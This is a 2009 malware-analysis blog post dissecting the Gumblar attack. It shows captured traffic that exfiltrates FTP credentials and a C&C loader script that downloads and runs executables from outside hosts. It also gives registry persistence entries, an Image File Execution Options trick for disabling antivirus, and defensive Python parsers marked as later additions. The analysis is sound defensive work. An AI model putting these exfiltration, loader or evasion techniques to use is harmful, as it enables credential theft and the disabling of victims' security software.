Inside the Massive Gumblar Attack

I first found out about Gumblar a couple of days ago via one of ScanSafe's blog posts. Responsible for 42% of "all malicious infections found on websites" (Sophos) during a seven-day period, Gumblar (JSRedir-R) has been extremely effective at propagating. Many bloggers have been focusing on the script involved in the attack, not so much on what happens when a client is compromised. I will attempt to cover this portion of the attack in detail.

Summary

Once compromised by the Gumblar / Martuz / Geno attack, victims have many pieces of malware loaded onto their machines. This malware does the following:

Steals FTP credentials
Sends SPAM
Installs fake antivirus
Hijacks Google search queries
Disables security software

The exploits used are for Adobe Acrobat and Adobe Flash Player.

Some further reading:

unmaskparasites
dynamoo

FTP credential stealing

While observing the bot in my lab, the first thing that indicated the ability to steal credentials was the bot trying to put my network card into promiscuous mode. I then logged into ftp.mozilla.org as anonymous and, sure enough, my credentials were exfiltrated in an encoded format.

POST /good/receiver/ftp HTTP/1.1
Host: 78.109.29.114
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lIGgQw

Doing a little recon, we can see the attacker is using "Capture Manager v1.0", a purchase which seems to be really paying off for them.

(Screenshot: Capture Manager)

As mentioned earlier, the malware downloads software to sniff network traffic: WinPcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.

An entry is made in the registry for WinPcap: HKLM\SOFTWARE\WinPcap

SPAM

The first time I infected myself with the malware, a SPAM bot was installed whose communication looked like Pushdo. However, the second time I infected myself, the malware exhibited different behavior and did not send the same traffic. My firewall still recorded drops on port 25, so the malware authors must be deploying a different SPAM engine now. I have not had a chance to investigate this portion of the attack any further.

Fake Antivirus

As with so many attacks of late, fake antivirus is also installed on the affected machines. In this case it is "System Security 2009"; screenshots below.

(Screenshots: System Security 2009 fake antivirus)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009

Search Hijacking

The next portion of the attack involves hijacking Google search results. The malware installs a proxy on port 7171 which then redirects searches. When a user searches for something, the malware sends the user to a page of its choosing filled with bogus search results. Here is an example of what you get after clicking a Google search result for "car".

(Screenshot: hijacked search result page for "car")

Sys32dll.exe contains the proxy, and a firewall exception is added for it as well. Also note that a rule is added for port 80.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: "http=localhost:7171"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:SYS32DLL"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: "7171:TCP:*:Enabled:SYS32DLL"

Disable Security Software

In order to keep itself running and make life more difficult for both analysts and users, the malware disables many security and administrative tools by redirecting them to the Windows system debugger through an Image File Execution Options entry. Here is an example:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: "ntsd -d"

And here is a list of all the blocked applications:

a2service.exe
ArcaCheck.exe
arcavir.exe
ashDisp.exe
ashEnhcd.exe
ashServ.exe
ashUpd.exe
aswUpdSv.exe
autoruns.exe
avadmin.exe
avcenter.exe
avcls.exe
avconfig.exe
avconsol.exe
avgnt.exe
avgrssvc.exe
avguard.exe
AvMonitor.exe
avp.com
avp.exe
AVP32.EXE
avscan.exe
avz.exe
avz4.exe
avz_se.exe
bdagent.exe
bdinit.exe
caav.exe
caavguiscan.exe
casecuritycenter.exe
CCenter.exe
ccupdate.exe
cfp.exe
cfpupdat.exe
cmdagent.exe
drwadins.exe
DRWEB32.EXE
drwebupw.exe
ekrn.exe
FAMEH32.EXE
filemon.exe
FPAVServer.exe
fpscan.exe
FPWin.exe
fsav32.exe
fsgk32st.exe
FSMA32.EXE
GFRing3.exe
guardgui.exe
guardxservice.exe
guardxup.exe
HijackThis.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPF.exe
KAVPFW.exe
KAVStart.exe
KPFW32.exe
KPFW32X.exe
Navapsvc.exe
Navapw32.exe
navigator.exe
NAVNT.EXE
NAVSTUB.EXE
NAVW32.EXE
NAVWNT.EXE
niu.exe
nod32.exe
nod32krn.exe
Nvcc.exe
OllyDBG.EXE
outpost.exe
preupd.exe
procexp.exe
pskdr.exe
regedit.exe
regmon.exe
RegTool.exe
scan32.exe
SfFnUp.exe
Vba32arkit.exe
vba32ldr.exe
vsserv.exe
Zanda.exe
zapro.exe
Zlh.exe
zonealarm.exe
zoneband.dll

Domains

Since both gumblar.cn and martuz.cn are down as of this writing, I will discuss the secondary domains involved in the attack. These are the domains that actually host the malware and exploits; they listen on port 8080, so they may seem offline if you try connecting directly.


These are additional domains involved in the attack:

nua20090515.com – C&C
i-site.ph – binary download
zz-dns.com – additional C&C?
main15052009.com – fake av related?
besthandycap.com
ya.ru
…and many more…

Other Information

Malware startup

1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: "C:\WINDOWS\system32\asferrort.exe srv"
2) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: "C:\WINDOWS\Temp\wpv701242765100.exe"
3) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: "c:\windows\pp10.exe" (I also saw pp08.exe, so this name is variable)
4) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: "C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe"
5) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: "C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe"
6) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: "c:\windows\ld08.exe"

An additional security provider is also installed in the form of digiwet.dll; I have not investigated this piece of the attack.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll"

A BHO (browser helper object) is also installed here:

HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: "C:\WINDOWS\system32\547372\547372.dll"
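To hunt for the registry artifacts described in the search hijacking, security software and security provider sections above, here is an added example (my code, not from the original post) that parses a .reg export and flags the quoted patterns: any Image File Execution Options Debugger value, a ProxyServer pointing at a local port, per-program firewall exceptions, and a SecurityProviders entry beyond the default set. The embedded .reg text is constructed from the values in the post, and the list of default XP providers is an assumption.

```python
import re
# Constructed .reg excerpt mirroring the values quoted in the post (not a real export).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe]
"Debugger"="ntsd -d"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"="http=localhost:7171"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"7171:TCP"="7171:TCP:*:Enabled:SYS32DLL"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll"
"""
IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
PROXY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"
SSP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders"
KNOWN_SSPS = {"msapsspc.dll", "schannel.dll", "digest.dll", "msnsspc.dll"}  # XP default set (assumption)

def parse_reg(text):
    """Parse a .reg export into {key: {value_name: data}}; string (REG_SZ) values only."""
    keys, cur = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            cur = keys.setdefault(line[1:-1], {})
        elif cur is not None and "=" in line:
            name, _, data = line.partition("=")
            cur[name.strip('"')] = data.strip('"').replace("\\\\", "\\")
    return keys

def audit(keys):
    """Return findings for the tampering patterns described in the post."""
    findings = []
    for key, vals in keys.items():
        if key.startswith(IFEO + "\\") and "Debugger" in vals:  # any IFEO Debugger is suspect
            exe = key.rsplit("\\", 1)[1]
            findings.append(f"IFEO debugger hijack: {exe} -> {vals['Debugger']}")
        if "GloballyOpenPorts\\List" in key:  # per-program firewall exceptions
            findings.extend(f"firewall exception: {d}" for d in vals.values() if "Enabled" in d)
    proxy = keys.get(PROXY_KEY, {}).get("ProxyServer", "")
    if re.search(r"(localhost|127\.0\.0\.1):\d+", proxy):  # browser routed through a local port
        findings.append(f"local proxy set: {proxy}")
    ssps = keys.get(SSP_KEY, {}).get("SecurityProviders", "")
    for dll in (d.strip().lower() for d in ssps.split(",") if d.strip()):
        if dll not in KNOWN_SSPS:  # extra DLL loaded by LSA at boot
            findings.append(f"unknown security provider: {dll}")
    return findings
```

Run it against a real export (regedit, File > Export, or `reg export`) of the keys above; any hit on a clean machine deserves a look.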

One of the pieces of malware (ld08.exe) also hooks several APIs:

(Screenshot: API hooks installed by ld08.exe)

C&C communication

The Magic-Number field below may be a key used to encode further communication, in order to hamper analysis.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=953988293&rnd=981633 HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 581632
Entity-Info: 1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;
Rnd: 982147
Magic-Number: 1024|1|121:12:234:245:236:103:151:67:93:53:56:150:6:94:36:63:106:66:140:194:113:23:183:92:85:78:68:182:185:205:58:51:217:36:40:198:140:191:10:234:245:66:128:252:160:164:59:10:230:200:205:88:223:132:181:53:210:249:235:140:198:38:191:160:74:231:102:215:167:113:193:156:180:65:152:85:230:211:95:205:155:45:37:123:178:218:176:132:211:156:16:154:194:208:58:13:183:161:228:95:19:166:251:199:232:148:28:206:104:124:155:4:170:193:127:92:155:48:224:111:204:241:10:143:194:69:156:121:231:129:217:250:39:212:194:15:105:223:222:209:92:122:214:6:59:85:98:215:134:67:71:83:53:82:226:247:151:126:113:127:0:74:122:39:31:60:55:136:28:22:90:120:144:48:126:204:134:225:164:12:36:236:95:89:62:65:81:214:192:194:85:193:13:207:232:44:12:32:181:40:54:15:161:199:64:31:148:198:0:57:211:37:38:51:127:100:117:208:59:53:147:144:247:160:96:223:204:108:0:130:149:55:145:54:255:210:86:148:153:87:205:108:124:243:159:252:88:20:204:148:74:96:36:65:0:133:33:205:242:34:79:136:89:225:190:89:179:20:237:77:108:187:185:232:175:89:228:7:110:177:155:185:17:192:251:18:70:29:223:56:63:47:192:153:16:127:243:196:148:224:17:0:155:203:233:74:37:205:82:148:127:238:78:145:174:73:163:244:103:131:45:166:178:238:64:195:110:51:135:2:20:153:2:175:101:235:250:138:185:76:30:57:58:108:202:233:182:110:222:29:241:12:196:164:251:5:103:105:57:239:107:77:136:110:253:237:90:247:120:20:68:150:77:127:3:24:105:186:135:71:216:121:84:156:29:79:162:132:184:219:116:36:40:252:146:37:233:236:29:98:0:97:249:78:225:252:102:74:183:237:146:143:102:231:44:132:54:206:9:239:169:125:19:209:121:166:247:99:146:20:197:147:118:190:225:88:187:72:162:115:54:53:2:157:28:47:33:83:253:42:66:167:167:86:121:33:252:112:133:143:133:75:34:252:9:4:84:197:77:247:56:131:44:59:32:73:106:66:156:104:108:222:15:20:52:136:53:49:249:186:192:126:5:227:122:15:232:207:213:53:198:13:185:242:73:218:59:179:28:216:28:136:182:43:156:235:179:210:28:172:141:220:43:146:192:166:162:168:117:119:222:59:133:151:46:206:113:106:130:142:66:159:23:249:202:180:228:126:134:1:43:19:222:8
6:166:158:253:73:71:114:193:37:174:70:188:220:21:46:70:152:188:137:55:211:130:2:136:103:128:14:104:171:34:71:2:201:229:255:18:44:114:211:81:32:26:14:253:47:60:67:200:249:205:255:205:79:1:85:182:130:100:31:45:135:102:48:80:76:48:99:121:162:55:203:194:81:217:191:129:22:3:73:16:208:73:222:32:75:51:215:205:152:247:251:31:94:44:112:170:92:211:36:254:10:239:193:91:201:129:221:224:132:38:241:85:112:207:118:188:3:77:137:155:69:133:187:163:178:43:78:14:254:114:13:8:98:206:100:43:79:65:12:212:104:253:42:217:204:160:149:207:238:31:107:51:165:38:214:87:81:36:101:79:151:115:88:249:65:189:37:145:255:49:102:104:46:144:65:250:49:214:202:31:246:53:83:155:91:42:242:172:79:88:252:230:203:85:223:13:19:5:159:18:54:5:123:100:150:189:95:199:147:42:231:138:95:58:37:187:101:24:104:180:112:101:155:60:186:123:74:206:128:233:225:182:239:92:27:133:25:123:77:173:165:52:55:5:111:93:192:213:117:40:137:230:141:37:35:72:160:109:22:33:87:247:216:70:84:243:204:110:111:25:27:20:78:83:25:190:176:218:147:38:2:28:13:144:66:48:217:227:158:239:4:245:231:221:60:60:208:9:170:64:35:198:84:113:25:110:47:202:73:194:240:76:223:254:220:34:46:181:5:205:165:10:195:141:231:0:201:184:9:116:248:44:58:77:158:83:188:206:30:5:145:15:81:113:13:46:147:60:228:153:9:137:163:205:23:138:205:225:67:214:85:59:3:143:136:161:227:69:112:2:74:1:17:156:114:30:202:5:91:174:159:100:56:66:50:79:205:255:49:16:213:134:75:217:22:212:123:250:26:235:252:100:236:14:1:95:44:203:100:135:122:4:236:179:70:30:3:19:30:52:36:243:187:112:205:209:69:72:204:95:51:201:196:32:215:197:127:3:145:228:139:11:232:120:191:46:151:194:66:181:246:103:169:177:215:119:131:28:191:80:123:242:25:63:18:240:4:145:244:149:118:
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1241292389:unique_start;1241530597:unique_start;1241643870:unique_start;1242216620:unique_start;1242765100:unique_start HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Content-Length: 0

This next portion is the bot receiving its commands on what files to download next:

POST /ld/gen.php HTTP/1.1
Host: nua20090515.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

f=0&a=953988293&v=08&c=0&s=ld&l=8174&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1

HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:37:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
9a
#PID=8174
START|http://www.i-site.ph/1/6244.exe
START|http://www.i-site.ph/1/nfr.exe
STARTONCE|http://www.i-site.ph/1/pp.10.exe
WAIT|120
#BLACKLABEL
EXIT
0
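As an added example (my code, not from the post), here are decoders for the two C&C formats captured above: the Entity-Info header returned by controller.php and the gen.php loader script. The field meanings assumed for Entity-Info (id:size:flag, with the id looking like a Unix timestamp) are inferred from the capture, not documented by the bot; the sample strings are copied from the captures in the post.

```python
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Strings copied from the capture in the post (Entity-Info header and gen.php body).
ENTITY_INFO = "1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;"
LOADER_SCRIPT = """#PID=8174
START|http://www.i-site.ph/1/6244.exe
START|http://www.i-site.ph/1/nfr.exe
STARTONCE|http://www.i-site.ph/1/pp.10.exe
WAIT|120
#BLACKLABEL
EXIT
"""

def parse_entity_info(header):
    """Split 'id:size:flag;' records. Treating the id as a Unix timestamp is an
    assumption; note the last id also appears in the dropped file wpv701242765100.exe."""
    entities = []
    for rec in filter(None, header.split(";")):
        ident, size, flag = (int(x) for x in rec.split(":"))
        when = datetime.fromtimestamp(ident, timezone.utc).strftime("%Y-%m-%d")
        entities.append({"id": ident, "size": size, "flag": flag, "id_as_date": when})
    return entities

def build_report_entity(entities, status="unique_start"):
    """Rebuild the 'entity=' value the bot echoed back in its report request."""
    return ";".join(f"{e['id']}:{status}" for e in entities)

def parse_loader_script(text):
    """Turn the gen.php script into (verb, argument) pairs; '#' lines carry metadata."""
    meta, commands = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            key, _, value = line[1:].partition("=")
            meta[key] = value
        else:
            verb, _, arg = line.partition("|")
            commands.append((verb, arg))
    return meta, commands

def download_hosts(commands):
    """Hosts the loader would fetch from: what to block or hunt for in proxy logs."""
    return sorted({urlsplit(arg).hostname for verb, arg in commands if verb in ("START", "STARTONCE")})
```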

Another GET that appears to be a bot check-in type request; note the empty User-Agent header.

GET /v50/?v=66&s=I&uid=953988293&p=8174&q= HTTP/1.0
Host: 85.13.236.154
User-Agent:

HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:39:28 GMT
Server: Apache/2.2.10 (Fedora)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache
Work-Server: 85.13.236.154
Content-Length: 0
Connection: close
Content-Type: text/html

That's all the analysis I have time for at the moment; this is a very large attack encompassing many malicious payloads. Hopefully more analysis will follow.
